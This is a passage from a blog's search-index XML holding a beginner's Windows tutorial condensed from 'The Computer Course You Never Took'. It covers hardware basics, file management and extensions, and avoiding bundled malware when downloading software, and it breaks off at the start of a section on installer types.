<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>The Computer Course You Never Took (你缺失的那门计算机课, continuously updated)</title>
<link href="/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/"/>
<url>/2025/11/26/%E4%BD%A0%E7%BC%BA%E5%A4%B1%E7%9A%84%E9%82%A3%E9%97%A8%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%AF%BE/</url>
<content type="html"><![CDATA[<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">This post summarises and guides the reader through the book 《你缺失的那门计算机课》 (The Computer Course You Never Took),</span><br><span class="line">aiming to help genuine computer beginners get started quickly.</span><br><span class="line">It follows the original's structure (a fundamentals part, a software part, an advanced part and so on)</span><br><span class="line">and tries to condense the original's already concise text even further.</span><br><span class="line"></span><br><span class="line">Started on 2025/11/26; continuously updated...</span><br><span class="line"></span><br><span class="line">This post is licensed under CC BY-NC-SA 4.0.</span><br><span class="line">The licence details can be viewed at https://creativecommons.org/licenses/by/4.0/deed.zh-hans</span><br><span class="line">Original work:</span><br><span class="line">《你缺失的那门计算机课》, web edition</span><br><span class="line">Authors: Hans Wan and Windy Deng</span><br><span class="line">URL: https://www.criwits.top/missing</span><br><span class="line">Licensed under CC BY-NC-SA 4.0</span><br><span class="line"></span><br><span class="line">If anything here infringes your rights, contact me and it will be removed at once!!!</span><br></pre></td></tr></table></figure><h1 id="序"><a href="#序" class="headerlink" title="Preface"></a><strong>Preface</strong></h1><p>In the digital age, using a computer well is an essential life skill, yet many people seriously lack this kind of “common knowledge”. Smartphones are everywhere, but the computer, because of its complexity and the things only it can do, remains indispensable, and so does the skill of using it.</p><p>The hope is that readers approach this book with a relaxed, curious mindset, pick up the essential computer literacy, and so hold their own in the digital tide and face future technology with confidence.</p><h1 id="第一部分-基础篇"><a href="#第一部分-基础篇" class="headerlink" title="Part 1 Fundamentals"></a><strong>Part 1</strong> <strong>Fundamentals</strong></h1><p>
Basic but very important computer skills: what a computer is made of (this really matters: it keeps you from being ripped off when buying one and lets you do simple troubleshooting when something goes wrong), file management, installing and uninstalling software, and some simple maintenance.</p><h2 id="第零章-一些约定与预备知识"><a href="#第零章-一些约定与预备知识" class="headerlink" title="Chapter 0 Conventions and prerequisites"></a>Chapter 0 Conventions and prerequisites</h2><h3 id="0-1-文中的标记符号"><a href="#0-1-文中的标记符号" class="headerlink" title="0.1 Notation used in the text"></a>0.1 Notation used in the text</h3><p>Everything that appears literally on screen is marked with square-corner brackets “【】”. For example, “right-click 【This PC】→【Properties】” means: right-click the 【This PC】 icon on the desktop, then click 【Properties】 in the menu that pops up.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126212119211.png" alt="image-20251126212119211"></p><h3 id="0-2-快捷键的注意事项"><a href="#0-2-快捷键的注意事项" class="headerlink" title="0.2 How to press shortcut keys"></a>0.2 How to press shortcut keys</h3><p>A shortcut is not pressed by hitting all of its keys at the same instant: press the keys in the order shown, holding each one down, and release them together at the end.</p><h3 id="0-3-F1-12功能按键"><a href="#0-3-F1-12功能按键" class="headerlink" title="0.3 The F1–F12 function keys"></a>0.3 The F1–F12 function keys</h3><p>The F1–F12 keys along the top of the keyboard do not type characters; they are combined with other keys to trigger functions. On laptop keyboards these 12 keys carry an extra layer of “extended functions” on top of their normal ones.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126212453085.png" alt="image-20251126212453085"></p><p>For example, if F1 has a mute symbol printed on it, its extended function is mute, used as Fn+F1, and so on for the others.</p><h3 id="0-4-“重启”不是关机再开机"><a href="#0-4-“重启”不是关机再开机" class="headerlink" title="0.4 “Restart” is not shut down and power on"></a>0.4 “Restart” is not shut down and power on</h3><p>“Restart” is not the same as “shut down, then switch on again”: with Windows' default Fast Startup, shutting down saves the running system kernel to disk and resumes it at the next boot, whereas Restart performs a full reboot. When the text says “restart”, use the 【Restart】 option in the Start menu rather than shutting the computer down and switching it back on by hand.</p><h3 id="0-5-存储容量的单位"><a href="#0-5-存储容量的单位" class="headerlink" title="0.5 Units of storage capacity"></a>0.5 Units of storage capacity</h3><p>The capacity units TB, GB, MB and KB relate as follows:</p><p>1 TB = 1024 GB = 1024 × 1024 MB = 1024<sup>3</sup> KB = 1024<sup>4</sup> bytes</p><p>Examples: a picture is anywhere from 1 KB to 10 MB; a large game (the original names “**洲”) is about 100 GB.</p><h3 id="0-6-“设置”和“控制面板”"><a href="#0-6-“设置”和“控制面板”" class="headerlink" title="0.6 “Settings” and “Control Panel”"></a>0.6 “Settings” and “Control Panel”</h3><p>The “Settings” app adjusts the vast majority of system options. Find the gear icon in the Start menu and click it to open Settings.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126213043230.png" alt="image-20251126213043230"></p><p>“Control Panel” has been used less and less since Windows 10, as most of its functions have moved into Settings. You only need it when the text explicitly says Control Panel.</p><h2 id="第一章-认识你的电脑"><a href="#第一章-认识你的电脑" class="headerlink" 
title="Chapter 1 Getting to know your computer"></a>Chapter 1 Getting to know your computer</h2><h3 id="1-1-硬件"><a href="#1-1-硬件" class="headerlink" title="1.1 Hardware"></a>1.1 Hardware</h3><h4 id="1-1-1-处理器-CPU"><a href="#1-1-1-处理器-CPU" class="headerlink" title="1.1.1 Processor (CPU)"></a>1.1.1 Processor (CPU)</h4><p>The central processing unit, usually just “CPU”, is the computer's “brain”: it performs all kinds of computation, which is how the computer does anything at all.</p><p>A computer gets hot, hot enough to need a fan, and a large share of that heat comes from the CPU.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126213751203.png" alt="image-20251126213751203"></p><p>The processor chip is exactly the thing China was “choked” on in the US–China trade war.</p><p>The processor largely determines performance: whether the machine feels smooth, whether games stutter, how quickly you get work done.</p><h4 id="1-1-2-内存(RAM)"><a href="#1-1-2-内存(RAM)" class="headerlink" title="1.1.2 Memory (RAM)"></a>1.1.2 Memory (RAM)</h4><p>The CPU only processes data; the data waiting to be processed has to be held somewhere temporarily. Memory is that temporary store.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126213802526.png" alt="image-20251126213802526"></p><p>Memory is extremely fast to read and write, but it loses its contents the moment power is cut, which is why office software asks you to “save”.</p><p>More memory means more room for the processor to keep data, so the computer can handle more tasks at once and generally feels smoother. This is what phones call “running memory”.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">On phones, memory is sometimes called “running memory”, but we do not recommend that term.</span><br><span class="line">See the “Hard disk” section below for why.</span><br></pre></td></tr></table></figure><h4 id="1-1-3-硬盘"><a href="#1-1-3-硬盘" class="headerlink" title="1.1.3 Hard disk"></a>1.1.3 Hard disk</h4><p>Memory stores data temporarily; the hard disk stores it for the long term. The processor pulls data from the disk into memory, works on it there, and writes the new data back to the disk when done.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Which is why the hacker in the movie steals the hard disk, not the monitor ()</span><br></pre></td></tr></table></figure><p>All the software on your computer also lives on the hard disk; uninstalling a program frees hard disk space.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214329073.png" alt="image-20251126214329073"></p><p>The space on a disk can be divided into “drives” (properly, “partitions”) to organise it better; the next chapter covers how to manage what is on your disk.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214535731.png" 
alt="image-20251126214535731"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">If you do not see the 【This PC】 icon on your desktop, open File Explorer (opening any folder will do) and find 【This PC】 in the navigation pane on the left.</span><br><span class="line">If you want 【This PC】 shown on the desktop, open Settings.</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214711973.png" alt="image-20251126214711973"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126214723876.png" alt="image-20251126214723876"></p><h4 id="1-1-4-显卡(GPU)"><a href="#1-1-4-显卡(GPU)" class="headerlink" title="1.1.4 Graphics card (GPU)"></a>1.1.4 Graphics card (GPU)</h4><p>The graphics card matters a lot for games and graphics work. An integrated GPU shares a chip with the CPU: cheap, low performance, low power. A discrete graphics card is a separate GPU: expensive, fast, power-hungry.</p><p>If you like games (especially large 3D ones), or do video editing or 3D design, a discrete graphics card is very much needed.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You may have seen high-end graphics cards online with huge cooling fans on them, a hint at how much power they draw and how much heat they produce ()</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126215219147.png" alt="image-20251126215219147"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">For AI model training and inference, the GPU's parallel compute gives far better performance than a CPU. Running AI locally needs enormous compute, more than even a high-end graphics card can supply, which means physical servers (and a correspondingly large bill).</span><br></pre></td></tr></table></figure><h3 id="1-2-软件"><a href="#1-2-软件" class="headerlink" title="1.2 Software"></a>1.2 Software</h3><h4 id="1-2-1-软件和操作系统"><a href="#1-2-1-软件和操作系统" class="headerlink" title="1.2.1 Software and operating systems"></a>1.2.1 Software and operating systems</h4><p>Think of a phone: the apps you installed yourself (QQ, WeChat, NetEase Cloud Music) and the preinstalled ones (Phone, Messages) are all “software”. Hardware is the prerequisite, but software is what performs each specific function.</p><p>Between the apps and the bare hardware sits a much larger, more “low-level” piece of software called the “operating system”.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126215706040.png" 
alt="image-20251126215706040"></p><p>Software built for one operating system does not run directly on another.</p><p>Phone operating systems include Android, iOS and HarmonyOS. If you have ever downloaded an app from a vendor's website you will have noticed separate download links per operating system; that is exactly because software for different systems is mutually incompatible.</p><p>On computers the three most common operating systems are Windows, Linux and macOS. Windows is by far the most widespread and runs on the large majority of personal computers. Linux is used mostly on servers, though some professionals use it daily. macOS is Apple's system and generally runs only on Apple hardware.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220024875.png" alt="image-20251126220024875"></p><h3 id="1-2-2-windows操作系统"><a href="#1-2-2-windows操作系统" class="headerlink" title="1.2.2 The Windows operating system"></a>1.2.2 The Windows operating system</h3><p>Most people use Windows, and this is a Windows-based computer tutorial.</p><p>“Windows XP”, “Windows 7” and “Windows 11” are different versions of the Windows operating system.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Windows is developed by Microsoft. If you have read about this before, you will know that most Windows copies in use here are pirated, partly because a genuine licence is expensive and partly because Microsoft has been fairly relaxed about it, so everyone gets to run a “pirated” Windows that looks no different from the genuine one.</span><br></pre></td></tr></table></figure><p>From a security standpoint, though, an “activator” or a pre-patched system image downloaded from a third party is not “no different” from a genuine install: such tools are a common carrier of malware, and their instructions usually begin with “turn off your antivirus”.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220509976.png" alt="image-20251126220509976"></p><p>This text assumes Windows 11 or Windows 10; every operation is described for the Simplified Chinese editions of those systems.</p><h2 id="第二章-文件与文件管理"><a href="#第二章-文件与文件管理" class="headerlink" title="Chapter 2 Files and file management"></a>Chapter 2 Files and file management</h2><p>Chapter 1 showed that the hard disk is where a computer stores data; the “file” is the concrete form that storage takes. The Word documents and PowerPoint decks you write, the pictures and videos you download, even the programs themselves, are all stored on disk as files. This chapter covers files and how to manage them.</p><h3 id="2-1-硬盘分区"><a href="#2-1-硬盘分区" class="headerlink" title="2.1 Disk partitions"></a>2.1 Disk partitions</h3><p>Double-click 【This PC】 on the desktop to open “File Explorer” (“Explorer” for short). Inside you will see one or more “drives”, properly called “partitions”: as the name suggests, they divide the disk's space into sub-areas so that it is easier to manage and organise.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220837224.png" alt="image-20251126220837224"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220848920.png" alt="image-20251126220848920"></p><p>A partition has two identifiers, or “names”:<img 
src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126220916272.png" alt="image-20251126220916272"></p><p>As Chapter 1 mentioned, the operating system is itself a large piece of software; on Windows the whole system lives on the C: drive by default.</p><p>You may have heard “don't install software to C:”. There are two reasons: first, while the system runs (that is, while you use the computer) it keeps creating new files on C:, and if little space is left the drive can fill up and slow the machine down; second, when you work with files there it is easy to modify a system file by mistake and crash the system (blue screen).</p><p>Later in this text we cover how to make sensible use of each partition.</p><h3 id="2-2-文件名和后缀"><a href="#2-2-文件名和后缀" class="headerlink" title="2.2 File names and extensions"></a>2.2 File names and extensions</h3><p>In Windows a file name has three parts: the name, a dot, and the extension.</p><p>The “extension” is the part of the file name after the dot. It indicates the file type and tells the operating system how the file should be opened.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221648192.png" alt="image-20251126221648192"></p><p>If extensions are not shown on your computer (that is, you only see the main part of the name), like this:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221731481.png" alt="image-20251126221731481"></p><p>then in Windows 10 click the 【View】 tab at the top of the folder window and tick 【File name extensions】 (in Windows 11 it is 【View】→【Show】→【File name extensions】):</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221752208.png" alt="image-20251126221752208"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221808774.png" alt="image-20251126221808774"></p><p>An extension can be changed by hand, but doing so usually causes problems:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221827979.png" alt="image-20251126221827979"></p><p>“Then, since I don't want to change a file's extension by accident, I'd rather keep extensions hidden.” If that is your thinking, another danger is creeping up on you. Look at these two files:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126221900782.png" alt="image-20251126221900782"></p><p>The second file is actually an exe (application) file!</p><p>This is the classic double-extension trick: a file named, say, report.docx.exe is displayed as report.docx once extensions are hidden. With extensions hidden, sooner or later someone sends you a piece of malware disguised like this, and that will not end well (). Keep extensions visible, and treat any file whose icon and extension disagree as suspect.</p><h3 id="2-3-文件夹,路径和目录"><a href="#2-3-文件夹,路径和目录" class="headerlink" title="2.3 Folders, paths and directories"></a>2.3 Folders, paths and directories</h3><p>A “folder” is a structure that holds other files. It can hold many files of any kind, and folders can nest inside folders like Russian dolls, so a folder's internal structure can get quite intricate.</p><p>Suppose that in the missing folder on the D: drive there is a subfolder called 源文件, and inside it a file called 第三章.docx. We write the location of 第三章.docx on the computer like this:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">D:\missing\源文件\第三章.docx</span><br></pre></td></tr></table></figure><p>This is a path.</p><p>You may also have heard the word “directory”. A directory is just a folder. “Open the directory D:\missing\public” means open the public folder inside the missing folder on D:.</p><p>Drawing the nested levels of directories (folders) from top to bottom gives a “directory tree”.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126222258109.png" alt="image-20251126222258109"></p><h3 id="2-4-程序本身-exe可执行文件"><a href="#2-4-程序本身-exe可执行文件" class="headerlink" title="2.4 The program itself: exe executables"></a>2.4 The program itself: exe executables</h3><p>One special kind of file is the “executable”.</p><p>The Word documents you write are stored as files with the extension doc or docx; the pictures you download usually have the extension jpg, png or gif. We also said that software is stored on disk as files. The software itself, then, is an exe executable file.</p><p>An ordinary file needs some other program to open it; an “executable” runs itself when double-clicked. That is what “executable” means.</p><p>Example: the root directory of NetEase Cloud Music.</p><p>As you can see, NetEase Cloud Music consists of these files:</p><p>The executable cloudmusic.exe, the main program.</p><p>Executables such as cloudmusic_reporter.exe and cloudmusic_util.exe: helper programs used while the software runs. They usually cannot run on their own, and the main program cloudmusic.exe cannot run properly without them either.</p><p>A pile of dll and other files: dependencies the software cannot work without.</p><p>Some subfolders holding resources the software needs at run time.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126222606434.png" alt="image-20251126222606434"></p><h3 id="1-5-快捷方式"><a href="#1-5-快捷方式" class="headerlink" title="2.5 Shortcuts"></a>2.5 Shortcuts</h3><p>How do you start an application?</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126222734633.png" alt="image-20251126222734633"></p><p>The icons on the desktop are not the software itself; they are a special kind of file called a “shortcut”. Opening the shortcut is the same as opening the real thing.</p><p>Deleting the shortcut does not affect cloudmusic.exe or the NetEase Cloud Music installation on your computer.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You may have seen the joke where a girlfriend deletes all the games on her boyfriend's computer... or rather, all their shortcuts ()</span><br></pre></td></tr></table></figure><p>A shortcut's icon normally has a small “↗” arrow in its bottom-left corner, marking that the file is a shortcut rather than the thing itself.</p><p>Because a shortcut is a file that can point at any command, right-click → 【Properties】 → 【Target】 shows what it really runs; a shortcut that arrives by mail or inside a download deserves the same suspicion as an exe.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223009426.png" alt="image-20251126223009426"></p><h3 
id="2-6-压缩文件"><a href="#2-6-压缩文件" class="headerlink" title="2.6 Compressed files"></a>2.6 Compressed files</h3><p>Someone may have told you to “pack these files up and send them to me”. They meant a compressed file.</p><p>You may have tried dragging a folder into a WeChat chat window and found that it cannot be sent; that is when you need a compressed file.</p><p>A “compression tool” packs a loose set of files and folders into a single compressed file.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223218875.png" alt="image-20251126223218875"></p><p>There are many compressed formats; the common ones are zip and rar, but the software for the latter is paid. When exchanging files with others we recommend packing them as zip.</p><p>When you receive a compressed file you usually need to extract it to recover the original files. Windows 11 has a built-in tool that I find adequate for everyday use:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223430853.png" alt="image-20251126223430853"></p><p>Choose the folder to extract to and click 【Extract】<img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223504866.png" alt="image-20251126223504866"></p><p>and the files are extracted. Packing works the same way:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223731322.png" alt="image-20251126223731322"></p><p>Hold the left mouse button and drag to select several files<img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223635556.png" alt="image-20251126223635556"></p><p>then, with the files selected (four spreadsheet files in this example), click 【Compress to】</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126223815890.png" alt="image-20251126223815890"></p><p>and the archive is created.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">To just look inside an archive without extracting it, double-click it and the compression tool shows its contents.</span><br><span class="line">Double-clicking a single file inside temporarily extracts and opens that one file; dragging a single file out extracts only that file rather than the whole archive.</span><br><span class="line">But if you want to run a program (executable) from inside an archive, extract the whole archive first, otherwise the program will very likely not work.</span><br></pre></td></tr></table></figure><h3 id="2-7-文件打开方式"><a href="#2-7-文件打开方式" class="headerlink" title="2.7 Which program opens a file"></a>2.7 Which program opens a file</h3><p>As said earlier, different file types are opened with different software. For a given file type, the program that opens it is its “opener” (“Open with”). Using the wrong one causes problems.</p><p>It is easy to guess: doc and docx Word documents open with Word or WPS; jpg and png images open with image viewers; a pdf document opens with a PDF 
reader.</p><p>The system picks a default opener for each file type automatically, and you can change it in Settings. Sometimes you do not want the preset program; for example:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126224245622.png" alt="image-20251126224245622"></p><h3 id="2-8-管理好你的文件"><a href="#2-8-管理好你的文件" class="headerlink" title="2.8 Keep your files organised"></a>2.8 Keep your files organised</h3><p>Set up folders on the disk and organise your computer the way you would organise paper files: you find things faster and waste less disk space. Make sensible use of the partitions and, where possible, avoid keeping large numbers of important files on C:.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">My own desktop is a mess, so I am hardly one to talk ()</span><br></pre></td></tr></table></figure><h2 id="第三章-软件的下载与安装"><a href="#第三章-软件的下载与安装" class="headerlink" title="Chapter 3 Downloading and installing software"></a>Chapter 3 Downloading and installing software</h2><p>Finding and installing software is not trivial: where do I download it? How? Once downloaded, how do I install it? Then what? What, it costs money? What is a “crack”?</p><p>This chapter gives an introduction, <strong>with particular emphasis</strong>, to downloading, installing and configuring Windows software in the Chinese internet environment.</p><h3 id="3-1-安装与安装包"><a href="#3-1-安装与安装包" class="headerlink" title="3.1 Installation and installers"></a>3.1 Installation and installers</h3><p>Some software is installed through an “installer” (usually an exe file), which, much like an archive, releases a large set of files into the right places on your computer in the structure they need in order to work.</p><h3 id="3-2-寻找安装包"><a href="#3-2-寻找安装包" class="headerlink" title="3.2 Finding the installer"></a>3.2 Finding the installer</h3><h4 id="3-2-1-优先考虑官方网站"><a href="#3-2-1-优先考虑官方网站" class="headerlink" title="3.2.1 Prefer the official website"></a>3.2.1 Prefer the official website</h4><p>The first place to look is the official website, the cleanest source by far.</p><p>However, search engines carry a lot of advertising, and ads are placed near the top to attract clicks, so the top results are not necessarily the official site. You need to look carefully. For example, searching Baidu for WPS:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225026762.png" alt="image-20251126225026762"></p><p>Only result 4 is the official site. Did you spot it?</p><p>Note that result 4's address ends in .wps.cn, which is the official WPS website. Look closely at the other addresses and you will see they are either ads or “software download sites” (we explain below why to avoid those).</p><p>Here is how to tell whether a site is official. Look at these things:</p><p>• The address. An official site's address is normally the company's or product's name, for example:</p><p> – WPS: wps.cn.</p><p> – QQ: qq.com.</p><p> – NetEase Cloud Music: 163.com.</p><p> – Steam: steampowered.com.</p><p>What matters is the domain, the part between “https://” and the next “/”, read from its right-hand end: wps.cn belongs to WPS, but something like wps.cn.example.com (a made-up illustration) belongs to whoever owns example.com. A padlock or “https” only means the connection is encrypted; it says nothing about whether the site is genuine.</p><p>• Elimination. No software vendor is called “✕✕ Software Station”, “✕✕ Download Station” or “✕✕ Software Garden”. <strong>Every</strong> site with such a name is a third-party download site.</p><p>• 
Meaning. An ad site's title usually has no real connection to the search term. Look again at the top ads in the search above: they are typically misnamed (“office software”, “Office”, rather than “WPS”).</p><p>The problem gets worse when the software is foreign:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225453251.png" alt="image-20251126225453251"></p><p>Again only result 6 is right; keep your eyes open.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225555055.png" alt="image-20251126225555055"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225602982.png" alt="image-20251126225602982"></p><p>That is not all. Once on the genuine site, look for the installer you need. If the software comes in “32-bit” and “64-bit” variants (also written “32-bit/64-bit” or “x86/x64”), you also need to know your operating system's type.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Open Settings and go to 【System】→【System info】 (in Windows 10, 【About】);</span><br><span class="line">under 【Device specifications】 find 【System type】 and choose the download according to the table below.</span><br></pre></td></tr></table></figure><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225732960.png" alt="image-20251126225732960"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225752823.png" alt="image-20251126225752823"></p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126225759835.png" alt="image-20251126225759835"></p><h4 id="3-2-2-直面深渊:第三方软件站"><a href="#3-2-2-直面深渊:第三方软件站" class="headerlink" title="3.2.2 Facing the abyss: third-party download sites"></a>3.2.2 Facing the abyss: third-party download sites</h4><p>This is the most dangerous place to download software, but with careful judgement you can still “walk through the flowers without a petal sticking to you”.</p><p>Sometimes we genuinely cannot find a program's official site, or for one reason or another cannot download from it. Then we must face the abyss and download from one of the many third-party download sites.</p><p>Here is the key point: once on such a site, <strong>avoid every button labelled 【High-speed download】【Fast download】【Safe download】【P2P download】</strong>, and do not click any ad. Instead choose buttons such as 【Normal download】 or 【Local download】:</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126230045042.png" alt="image-20251126230045042"></p><p>Clicking that takes you to a “download address” page like this. Again, <strong>do not click any link under “Prefer ✕✕ Manager to download”</strong>; click the links such as <strong>【General network download】 under “Normal download address”</strong>:</p><p><img 
src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126230128875.png" alt="image-20251126230128875"></p><p>The file obtained via 【General network download】 is an archive of about 133 MB, which matches the size of this software.</p><p>Extract it and you have the OBS Studio installer.</p><p>The file obtained from the so-called 【Safe download】 above is only 20.3 MB and is an unidentified “executable” (exe file). Compared with the former, it looks very suspicious.</p><p><img src="https://bucketqiao123456.oss-cn-beijing.aliyuncs.com/image-20251126230327517.png" alt="image-20251126230327517"></p><p>Indeed, it is not the OBS Studio installer but the installer of some obscure “✕✕ Manager”. This “manager” may maliciously install any number of programs of unknown origin: downloading all sorts of things onto your computer, popping up “one slash for 999” game ads, hijacking your search engine and seriously slowing the machine down.</p><p>Two checks settle doubts like this: compare the size with what the official site states, and open 【Properties】→【Digital Signatures】 on the downloaded file. A genuine installer from a major vendor is signed by that vendor; an unsigned file, or one signed by a company you have never heard of, is not the installer you wanted. When the official site publishes a checksum (SHA-256 or similar), compare that as well.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">This kind of “rogue software” is extremely persistent, worms its way into every corner of the computer, and is very hard to remove completely; if you catch one, be prepared to reinstall the system to be rid of it ()</span><br></pre></td></tr></table></figure><h4 id="3-2-3-另辟蹊径:软件公众号和其他小众渠道"><a href="#3-2-3-另辟蹊径:软件公众号和其他小众渠道" class="headerlink" title="3.2.3 Another route: software WeChat accounts and other niche channels"></a>3.2.3 Another route: software WeChat accounts and other niche channels</h4><p>Another “alternative route” is to download through “niche channels”, such as WeChat public accounts that share software. It is not a bad approach: the well-regarded accounts that people recommend to each other generally keep clean installers of common software neatly categorised and shared. Compared with the various “download stations”, they spare us the worry of downloading malware.</p><p>The drawbacks: such accounts and small sites are hard to find, and they usually share files through cloud-drive platforms, which heavily throttle non-members, so the experience suffers.</p><p>Overall, though, it is still a method worth recommending. Bear in mind that a file re-hosted by an anonymous account cannot be traced back to the vendor, so the same signature and checksum checks as for download sites apply before you run it.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">We have not collected many such accounts and so cannot recommend any here. Look for them yourself on Bilibili, Tieba, Weibo and so on.</span><br></pre></td></tr></table></figure><h4 id="3-2-4-第三方软件管家"><a href="#3-2-4-第三方软件管家" class="headerlink" title="3.2.4 Third-party software managers"></a>3.2.4 Third-party software managers</h4><p>Third-party “software managers” can also help find the software you need. Some are maintained by PC makers, e.g. “Lenovo Software Manager” and “Huawei Software Manager”; others by third-party companies, e.g. “360 Software Manager” and “Tencent Software Center”.</p><p>Generally the ones maintained by PC makers are relatively clean and do not come with a “family bucket” of bundled apps (be wary of 360).</p><p>The drawbacks are an incomplete catalogue or missing updates, and they all nag the user to some degree to install their companion software.</p><h3 id="3-3-来安装文件吧"><a href="#3-3-来安装文件吧" class="headerlink" title="3.3 Let's install"></a>3.3 Let's install</h3><p>Suppose that, after all this sparring with websites, you have downloaded an installer. It will be one of the following three kinds of file.</p><h4 id="3-3-1-一个光秃秃的-exe-文件或者-msi-文件。"><a 
